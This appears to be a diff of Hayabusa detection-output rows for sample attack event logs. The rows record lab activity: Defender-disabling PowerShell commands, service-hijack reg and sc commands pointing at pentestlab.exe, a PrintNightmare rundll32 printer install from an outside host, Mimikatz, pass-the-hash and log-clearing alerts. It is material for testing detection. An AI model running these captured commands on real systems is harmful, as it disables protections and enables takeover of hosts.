+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.997 +09:00,LAPTOP-JU4M3I0E,5,info,,Process Terminated,Process: C:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p | LID: 0xbf9eb | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.303 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140_1.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=58D562E8E3496A97E0CFE34C64B7AC79F40A9367,MD5=639584D9FCDC54D7644328650028F453,SHA256=4EF85487DE3B07AB52D269A51CFC2499C2E77ECBE2C63EC556F2C59AAD311B81,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.315 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\UpdateRingSettings.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=50FBFD34BCB3A0CDCAE94D963AF6DA5B6EAAF702,MD5=E5783051077ECC0CF81051ACC6C7872D,SHA256=8E63CC1DDD7C554532FB00A2E3198D712ED19DD64EF6818119AFC2A5214148A8,IMPHASH=8B31BD73AB0C52BD4506C09FDABE59CE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.324 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\LoggingPlatform.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=479CD840A5352F76051B5722E4CD9004C72567EC,MD5=090BBA421A213F67FBFE10231116E008,SHA256=1E8923D71C32876B53A887983C63BC94914AB91CAAF1E13D3979F64F529DD043,IMPHASH=D39A0141F3324CB1CE047427FD20FCEA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.335 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.342 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.344 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.350 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.355 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.513 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\OneDriveTelemetryStable.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=8D3D5F03E129C08F890847F7B12E620F9315B396,MD5=B01D2385E32F4251399C7EDCE8364967,SHA256=5E6CC575BEC320E4502B48B1050FE255BF6504013FAA6EE62A80707E3092383E,IMPHASH=C719A37B3234505BC0AADBB7DE7C9654",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.545 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileSyncTelemetryExtensions.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=B535176F0E42CE3DEE9F650070AB1CAEA840CFBF,MD5=68E4FB636BC56B74BF54F18223238862,SHA256=1084C4AF96A06F8A84CA279C659394ACB1BC80D1F5DBC16EB62964C5632C41A0,IMPHASH=D207E97F105829D9C63E79F98B136D2B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.931 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuthLib64.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=FFFD189CF1234EC54392F57C8D6D683A92DEB2B4,MD5=5E3A74A8E0295B1396C1A5D5D5C0664F,SHA256=E0132392E8014B120BBF51F2E98E9BB329877666A7D005353A4E96DF14DFFD4C,IMPHASH=592278570E604A14992850A5B210142D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-10-02 02:30:39.083 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: at 13:20 /interactive cmd | Path: C:\Windows\System32\at.exe | PID: 0x15cc | User: admmig | LID: 0x65b0f5db,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Interactive shell using AT schedule task.evtx
+2021-10-06 18:46:09.533 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -EnableControlledFolderAccess Disabled"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x242c | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx
+2021-10-06 18:46:13.168 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -PUAProtection disable"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x21f4 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx
+2021-10-06 18:46:28.683 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1bcc | User: WIN10-02$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx
+2021-10-07 23:52:54.848 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time"" /v FailureCommand /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x2a58 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx
+2021-10-07 23:53:02.147 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc failure W32Time command= ""\""c:\Windows\system32\pentestlab.exe\"""" | Path: C:\Windows\System32\sc.exe | PID: 0xa00 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx
+2021-10-08 00:36:23.429 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc config xboxgip binPath= ""C:\windows\system32\pentestlab.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x29cc | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx
+2021-10-08 00:36:24.892 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xboxgip"" /v ImagePath /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x11b8 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx
+2021-10-08 17:53:42.131 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc sdset xboxgip ""D:(A;;CCLCSWRPWPDTLOCRRC;;;SY) | Path: C:\Windows\System32\sc.exe | PID: 0x1d28 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (sc).evtx
+2021-10-08 19:05:29.432 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\XblGameSave\Security"" /v Security /t REG_BINARY /d fe340ead | Path: C:\Windows\System32\reg.exe | PID: 0x18c4 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx
+2021-10-08 19:05:36.298 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2af0 | User: WIN10-02$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx
+2021-10-08 21:56:58.803 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-08 21:57:04.504 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: gentilguest | IP Address: 20.188.56.147 | Process:  | Target Server: printnightmare.gentilkiwi.com,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: rundll32 printui.dll,PrintUIEntry /in /n""\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"" | Path: C:\Windows\System32\rundll32.exe | PID: 0x1670 | User: admmig | LID: 0x65b0f5db",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-08 21:57:18.646 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-08 21:57:19.072 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
+2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx
+2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx
+2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,low,Persis,Local User Account Created,User: toto3 | SID: S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx
+2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx
+2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx
+2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,medium,,File Created_Sysmon Alert,T1003 | Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 512 | PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx
+2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx
+2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,info,,Logon Type 9 - NewCredentials,User: admmig | Computer: - | IP Addr: ::1 | LID: 0x266e045 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
